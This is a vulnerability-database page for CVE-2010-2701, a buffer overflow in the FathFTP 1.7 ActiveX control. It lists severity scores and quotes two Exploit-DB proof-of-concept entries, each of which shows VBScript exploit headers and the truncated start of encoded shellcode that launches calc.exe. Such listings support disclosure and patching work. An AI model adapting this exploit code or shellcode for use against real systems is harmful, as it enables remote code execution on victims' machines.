CVE-2010-2701
published 2010-07-12CVE-2010-2701: Multiple buffer overflows in the FathFTP ActiveX control 1.7 allow remote attackers to execute arbitrary code via (1) the GetFromURL member or (2) a long…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.06%
91.2th percentile
Multiple buffer overflows in the FathFTP ActiveX control 1.7 allow remote attackers to execute arbitrary code via (1) the GetFromURL member or (2) a long argument to the RasIsConnected method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fathsoft | fathftp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FathFTP 1.8 - 'RasIsConnected Method' ActiveX Buffer Overflow (SEH)
exploitdb·2010-08-03
CVE-2010-2701 FathFTP 1.8 - 'RasIsConnected Method' ActiveX Buffer Overflow (SEH)
FathFTP 1.8 - 'RasIsConnected Method' ActiveX Buffer Overflow (SEH)
---
' Exploit Title: FathFTP 1.8 (SEH) ActiveX Buffer Overflow
' Author: MadjiX
' Software Link: http://www.fathsoft.com/fathftp.html
' Version 1.7 : http://www.exploit-db.com/exploits/14269/ (Thanks Blake)
' Tested on: Windows XP SP3 FR / IE6
' Visit : www.sec4ever.com
'---------------------------------------------------'
' _____ __ '
'____________________ // /_______ ______________ '
'__ ___/ _ \ ___/ // /_ _ \_ | / / _ \/ ___/ '
'_(__ )/ __/ /__ /__ __/ __/_ |/ // __/ / '
'/____/ \___/\___/ /_/ \___/_____/ \___//_/ '
' '
' Security Team Members '
'---------------------------------------------------'
' EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%4
Exploit-DB
FathFTP 1.7 - ActiveX Buffer Overflow
exploitdb·2010-07-08
CVE-2010-2701 FathFTP 1.7 - ActiveX Buffer Overflow
FathFTP 1.7 - ActiveX Buffer Overflow
---
' Exploit Title: FathFTP 1.7 ActiveX Buffer Overflow
' Date: July 7, 2010
' Author: Blake
' Software Link: http://www.softpedia.com/get/Programming/Components-Libraries/FathFTP.shtml
' Version: 1.7
' Tested on: Windows XP SP3 / IE6
' Note: The GetFromURL member is also vulnerable to a stack overflow (EIP overwrite).
' 6784 bytes of shellcode space
' EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
unescape("%4b%5
No writeups or analysis indexed.
2010-07-12
Published